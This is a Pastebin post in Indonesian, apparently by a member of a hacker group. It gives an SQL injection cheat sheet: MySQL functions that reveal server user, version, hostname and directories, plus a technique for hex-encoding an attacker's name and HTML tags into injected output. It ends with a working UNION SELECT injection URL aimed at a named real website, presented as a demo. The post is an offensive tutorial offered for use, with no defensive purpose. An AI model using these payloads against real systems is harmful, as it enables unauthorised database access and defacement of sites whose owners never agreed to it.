Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Assalamulaikum...
- Dibawah Ini adalah Beberapa Command SQL yang biasa di gunakan injector untuk memperoleh informasi tentang server DATABASE yg digunakan ::
- USER() :: CURRENT USER
- DATABASE() :: CURRENT DATABASE
- version() :: SQL Version
- @@version :: SQL Version
- schema() :: CURRENT DATABASE
- @@hostname :: CURRENT Hostname
- @@tmpdir :: Temp Directory
- @@datadir :: DATA Directory
- @@basedir :: Base Directory
- UUID() :: System UUID KEY
- system_user() :: CURRENT system USER
- session_user() :: SESSION USER
- @@Global.have_symlink :: Cek Symlink aktif/tidak
- @@Global.have_ssl :: Cek pakai SSL/tidak
- @@CHARACTER_SET_FILESYSTEM :: FILE SYSTEM
- @@VERSION_COMPILE_OS :: OPERASI SISTEM
- ========================================
- == Print name ==
- Menyelipkan Nama Hacker Saat Nginject..
- contoh :
- nama injector = Verry__D (CONVERT str2hex)
- 56657272795f5f44 << ini hasil CONVERT Verry__D ke hex
- tambahin 0x sebelum hasil CONVERT ke hexa..
- jadi :: 0x56657272795f5f44
- Print Nama Injector dan Versi :: concat(0xStringYgSudahDiConvertKeHex,version())
- contoh :
- concat(0x56657272795f5f44,version())
- Print Nama Injector dan versi dgn warna (memasukkan tag HTML)..
- concat(0x<font color=red>Injected BY Verry ::</font>,version())
- CONVERT ke hex
- <font color=red>Injected BY Verry ::</font>
- contoh ::
- concat(0x3c666f6e7420636f6c6f723d7265643e496e6a6563746564206279205665727279203a3a3c2f666f6e743e,version())
- Demo ::
- http://www.quentinlangley.net/article.php?ex=1&id=418+AND+FALSE+UNION+SELECT+1,2,concat(0x3c666f6e7420636f6c6f723d7265643e496e6a6563746564206279205665727279203a3a3c2f666f6e743e,version()),4,5,6,7,8--
- kreasikan Query mu :D
- thanks FOR Team Sec7or , rdot.org ,Hackforum , Securityidiots AND ALL injector :)
- Wassalamualaikum...
- ./Versailles
- ( Team Sec7or - Java Cyber Army )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement